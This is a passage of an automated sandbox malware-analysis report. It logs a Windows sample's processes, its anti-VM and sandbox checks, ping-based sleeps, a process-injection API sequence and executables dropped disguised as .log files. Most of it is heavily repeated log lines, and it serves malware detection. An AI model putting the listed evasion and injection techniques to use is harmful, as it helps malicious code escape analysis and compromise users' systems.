                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Contains functionality to compare user and computer (likely to detect sandboxes)
                                Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,46_2_00000001400010C0
                                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Uses ping.exe to sleep
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\PerfDll\hyperProviderSavesinto.exeMemory allocated: EC0000 memory reserve | memory write watchJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeMemory allocated: 1ABB0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeMemory allocated: 1350000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeMemory allocated: 1AEE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeMemory allocated: 2C10000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeMemory allocated: 1AE00000 memory reserve | memory write watch
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC493F1 sldt word ptr [eax]8_2_00007FFD9BC493F1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 599812
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 599425
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 599292
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 599094
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 598729
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 598234
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 598125
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 598012
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 597672
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 597546
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 597437
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 597273
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 597171
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 597056
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596804
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596662
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596542
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596434
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596327
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596218
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596108
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596000
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595890
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595781
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595628
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595515
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595406
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595296
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595187
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595077
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594968
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594859
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594750
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594638
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594530
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594421
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594311
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594203
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594093
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593984
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593875
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593765
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593656
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593465
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593324
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593216
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593099
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 592979
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 592867
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 592762
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3989Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5804Jump to behavior
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeWindow / User API: threadDelayed 3527
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeWindow / User API: threadDelayed 6318
                                Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 8408
                                Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1449
                                Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 2545
                                Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 7455
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeDropped PE file which has not been started: C:\Users\user\Desktop\XVmuemSr.logJump to dropped file
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeDropped PE file which has not been started: C:\Users\user\Desktop\phOzxInG.logJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\LugVktua.logJump to dropped file
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeDropped PE file which has not been started: C:\Users\user\Desktop\IkSFhrpY.logJump to dropped file
